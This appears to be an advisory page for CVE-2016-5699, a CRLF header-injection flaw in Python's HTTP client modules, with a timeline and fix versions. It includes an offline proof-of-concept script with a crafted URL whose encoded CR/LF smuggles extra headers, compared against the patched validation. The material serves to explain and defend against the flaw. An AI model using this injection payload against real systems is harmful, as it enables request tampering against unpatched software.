CVE-2016-5699: HTTP header injection

HTTP header injection in the urllib, urllib2, httplib and http.client modules.

CRLF injection vulnerability in the HTTPConnection.putheader() function in urllib2 and urllib in CPython before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.

Reported again in January 2016 by Timothy D. Morgan (Blindspot Security); full disclosure followed on 2016-06-15.
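The following is an added example, not code from this page or from CPython. It reproduces the injection on a constructed URL whose percent-encoded CR/LF end up in the decoded host, serialises the request once with a model of HTTPConnection.putheader() as it behaved before 2.7.10/3.4.4 (no validation) and once with the validation the fix introduced, and finally asks the running interpreter's http.client whether it still accepts such a value. POC_URL, the helper names and the two regexes (written here after the checks the fix added to http/client.py, so treat them as a model of the check rather than a verbatim copy) are assumptions of this example.

```python
import re
import http.client
from urllib.request import Request

# Constructed attacker-controlled URL (example input, not from the advisory):
# the netloc carries percent-encoded CR/LF. urllib.request.Request percent-
# decodes the host, so the CRLF sequences survive into Request.host.
POC_URL = "http://127.0.0.1%0d%0aX-Injected:%20yes%0d%0aX-Leftover:%20/foo"


def decoded_host(url: str) -> str:
    """Host exactly as urllib.request stores it (percent-decoded)."""
    return Request(url).host


def putheader_vulnerable(name: str, value: str) -> bytes:
    """Header line as putheader() emitted it before the fix: no validation,
    so a CRLF inside the value terminates the line and starts a new header."""
    return name.encode("ascii") + b": " + value.encode("latin-1") + b"\r\n"


# Modelled on the checks the fix added to http/client.py (assumption: see lead-in).
_is_legal_header_name = re.compile(rb"[^:\s][^:\r\n]*$").match
_is_illegal_header_value = re.compile(rb"\n(?![ \t])|\r(?![ \t\n])").search


def putheader_fixed(name: str, value: str) -> bytes:
    """Same serialisation with the post-fix validation: a bare CR or LF in a
    value is rejected, while CRLF followed by SP/HT (obsolete line folding)
    is still accepted, which is why folded values must be normalised elsewhere."""
    n = name.encode("ascii")
    v = value.encode("latin-1")
    if not _is_legal_header_name(n):
        raise ValueError("Invalid header name %r" % (n,))
    if _is_illegal_header_value(v):
        raise ValueError("Invalid header value %r" % (v,))
    return n + b": " + v + b"\r\n"


def build_request(putheader, host: str, selector: str = "/foo") -> bytes:
    """Serialise a minimal GET using the supplied putheader implementation."""
    out = [b"GET " + selector.encode("ascii") + b" HTTP/1.1\r\n"]
    out.append(putheader("Host", host))
    out.append(putheader("Accept-Encoding", "identity"))
    return b"".join(out) + b"\r\n"


def rejects(putheader, host: str) -> bool:
    """True if serialising a request for this host raises ValueError."""
    try:
        build_request(putheader, host)
    except ValueError:
        return True
    return False


def header_names(raw: bytes) -> list:
    """Header names as a receiving server would parse them from the wire bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return [line.split(b":", 1)[0].decode("latin-1")
            for line in head.split(b"\r\n")[1:] if line]


def stdlib_putheader_rejects(value: str) -> bool:
    """Does this interpreter's http.client refuse the value as a Host header?
    putrequest() only buffers; nothing is connected or sent, so this is offline."""
    conn = http.client.HTTPConnection("localhost")
    conn.putrequest("GET", "/foo", skip_host=True, skip_accept_encoding=True)
    try:
        conn.putheader("Host", value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    host = decoded_host(POC_URL)
    print("decoded host:", repr(host))
    raw = build_request(putheader_vulnerable, host)
    print(raw.decode("latin-1"))
    print("headers seen by server (vulnerable):", header_names(raw))
    print("fixed model rejects:", rejects(putheader_fixed, host))
    print("this interpreter's http.client rejects:", stdlib_putheader_rejects(host))
```

Running it shows the server-side view of the vulnerable output: the single Host header the client meant to send is parsed as Host, X-Injected and X-Leftover, which is the whole attack. The fixed model and a patched http.client both raise ValueError on the same host value.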

  • Disclosure date: 2014-11-24 (Python issue #22928 reported)
  • Red Hat impact: Moderate

Fixed In

  • Python 2.7.10 (2015-05-23)
  • Python 3.4.4 (2015-12-21)

Vulnerable Versions

  • Python 3.3

Python issue

HTTP header injection in urllib2/urllib/httplib/http.client (CVE-2016-5699).

  • Python issue: issue #22928
  • Creation date: 2014-11-24
  • Reporter: Guido Vranken

CVE-2016-5699

CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in CPython (aka Python) before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.

Timeline

Timeline using the disclosure date 2014-11-24 as reference:

  • 2014-11-24: Python issue #22928 reported by Guido Vranken
  • 2015-03-12 (+108 days): commit 59bdf63
  • 2015-03-12 (+108 days): commit a112a8a
  • 2015-05-23 (+180 days): Python 2.7.10 released
  • 2015-09-09 (+289 days): Python 3.5.0 released
  • 2015-12-21 (+392 days): Python 3.4.4 released
  • 2016-09-02 (+648 days): CVE-2016-5699 published